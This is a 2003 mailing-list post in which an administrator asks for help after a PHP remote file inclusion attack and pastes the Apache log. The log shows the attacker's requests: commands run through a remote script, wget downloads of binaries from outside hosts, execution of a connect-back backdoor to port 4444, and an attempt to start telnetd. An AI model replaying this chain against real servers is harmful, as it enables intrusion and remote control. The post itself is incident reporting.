Attack using php+apache

To: debian-security@lists.debian.org
Subject: Attack using php+apache
From: Carlos Eduardo Araujo Vieira <carllos@lia.ufc.br>
Date: Sat, 15 Nov 2003 21:10:00 -0200 (BRST)
Message-id: <[🔎] Pine.LNX.4.58.0311152104110.7438@lia.ufc.br>

	Today the server was attacked using php+apache. Some user had a
'require $area.php' in his index.php file. The attacker using this he
could execute some commands like entering the /tmp folder and downloading
some files. Then he tried to execute a telnetd daemon with no success. In
the attachmnt is the apache log containing the important parts. I dont
think that he did something more than that but i would like to know more
about this. I appreciate any help.

200.214.140.237 - - [15/Nov/2003:00:19:09 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a HTTP/1.1" 200 4117 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:19:10 -0200] "GET /~joeuser/estilos.css HTTP/1.1" 200 2581 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a"; "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:19:10 -0200] "GET /~joeuser/imagens/fox.gif HTTP/1.1" 200 3531 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a"; "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:19:10 -0200] "GET /~joeuser/imagens/topo.gif HTTP/1.1" 200 339 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a"; "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:19:10 -0200] "GET /favicon.ico HTTP/1.1" 404 288 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a"; "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:20:05 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;ls HTTP/1.1" 200 4279 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:20:24 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.indexlhr.hpg.com.br/c4 HTTP/1.1" 200 4723 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:20:25 -0200] "GET /~joeuser/estilos.css HTTP/1.1" 304 - "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.indexlhr.hpg.com.br/c4"; "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:20:26 -0200] "GET /~joeuser/imagens/fox.gif HTTP/1.1" 304 - "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.indexlhr.hpg.com.br/c4"; "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:20:26 -0200] "GET /~joeuser/imagens/topo.gif HTTP/1.1" 304 - "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.indexlhr.hpg.com.br/c4"; "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:20:26 -0200] "GET /favicon.ico HTTP/1.1" 404 288 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.indexlhr.hpg.com.br/c4"; "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:20:40 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;chmod%207777%20c4;./c4 HTTP/1.1" 200 4110 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:39:49 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.indexlhr.hpg.com.br/db HTTP/1.1" 200 4718 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:41:26 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;chmod%207777%20bd;./bd%20200.214.140.237%204444 HTTP/1.1" 200 4038 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:41:56 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;chmod%207777%20bd; HTTP/1.1" 200 3999 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:42:10 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;./bd%20200.214.140.237%204444 HTTP/1.1" 200 4038 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:42:21 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;ls HTTP/1.1" 200 4291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:42:39 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;./db%20./bd%20200.214.140%204444 HTTP/1.1" 200 4019 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:43:39 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;chmod%207777%20db;./db%20./bd%20200.214.140%204444 HTTP/1.1" 200 4058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:48:00 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;./db%20200.214.140.237%204444 HTTP/1.1" 200 4112 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:49:44 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;./db%20200.214.140.237%204444 HTTP/1.1" 200 3999 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:53:12 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.zueirareri.hpg.com.br/telnetd HTTP/1.1" 200 5007 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:53:45 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;chmod%207777%20telnetd;./telnetd HTTP/1.1" 200 3999 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.140.237 - - [15/Nov/2003:00:55:16 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;./db%20200.214.140.237%204444 HTTP/1.1" 200 3999 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.147.121.153 - - [15/Nov/2003:01:29:07 -0200] "GET /~joeuser HTTP/1.1" 301 318 "-" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.147.121.153 - - [15/Nov/2003:01:29:08 -0200] "GET /~joeuser/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.147.121.153 - - [15/Nov/2003:01:29:13 -0200] "GET /~joeuser/estilos.css HTTP/1.1" 200 2581 "http://www.lia.ufc.br/~joeuser/"; "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.147.121.153 - - [15/Nov/2003:01:29:13 -0200] "GET /~joeuser/imagens/topo.gif HTTP/1.1" 200 339 "http://www.lia.ufc.br/~joeuser/"; "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.147.121.153 - - [15/Nov/2003:01:29:13 -0200] "GET /~joeuser/imagens/fox.gif HTTP/1.1" 200 3531 "http://www.lia.ufc.br/~joeuser/"; "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.147.121.153 - - [15/Nov/2003:01:29:20 -0200] "GET /favicon.ico HTTP/1.1" 404 288 "-" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.147.121.153 - - [15/Nov/2003:01:51:47 -0200] "GET /~joeuser HTTP/1.1" 301 318 "-" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.147.121.153 - - [15/Nov/2003:01:51:48 -0200] "GET /~joeuser/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.147.121.153 - - [15/Nov/2003:02:13:53 -0200] "GET /~joeuser HTTP/1.1" 301 318 "-" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.147.121.153 - - [15/Nov/2003:02:13:54 -0200] "GET /~joeuser/ HTTP/1.1" 200 3491 "-" "Mozilla/5.0 (compatible; Konqueror/2.2.2;
Linux)"~
200.147.121.153 - - [15/Nov/2003:02:14:45 -0200] "GET /~joeuser/index.txt HTTP/1.1" 200 3612 "-" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)"
200.214.138.79 - - [15/Nov/2003:09:01:51 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a HTTP/1.1" 200 3491 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.138.79 - - [15/Nov/2003:09:01:52 -0200] "GET /~joeuser/estilos.css HTTP/1.1" 200 2581 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a"; "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.138.79 - - [15/Nov/2003:09:01:53 -0200] "GET /favicon.ico HTTP/1.1" 404 288 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a"; "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.138.79 - - [15/Nov/2003:09:01:53 -0200] "GET /~joeuser/imagens/topo.gif HTTP/1.1" 200 339 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a"; "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.138.79 - - [15/Nov/2003:09:01:54 -0200] "GET /~joeuser/imagens/fox.gif HTTP/1.1" 200 3531 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a"; "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.214.138.79 - - [15/Nov/2003:09:02:46 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id HTTP/1.1" 200 3491 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
200.147.146.16 - - [15/Nov/2003:16:04:04 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a HTTP/1.1" 200 3491 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.147.146.16 - - [15/Nov/2003:16:04:05 -0200] "GET /~joeuser/estilos.css HTTP/1.1" 200 2581 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a"; "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.147.146.16 - - [15/Nov/2003:16:04:06 -0200] "GET /~joeuser/imagens/fox.gif HTTP/1.1" 200 3531 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a"; "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.147.146.16 - - [15/Nov/2003:16:04:06 -0200] "GET /~joeuser/imagens/topo.gif HTTP/1.1" 200 339 "http://lia.ufc.br/~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id;uname%20-a"; "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.147.146.16 - - [15/Nov/2003:16:04:20 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=id HTTP/1.1" 200 3491 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

Reply to:

Follow-Ups:
- Re: Attack using php+apache
  - From: "Tom Goulet (UID0)" <uid0@em.ca>
- Re: Attack using php+apache
  - From: Dion Mendel <quietude@iinet.net.au>

Prev by Date: Re: Mail server
Next by Date: Re: Attack using php+apache
Previous by thread: Re: Mail server
Next by thread: Re: Attack using php+apache
Index(es):
- Date
- Thread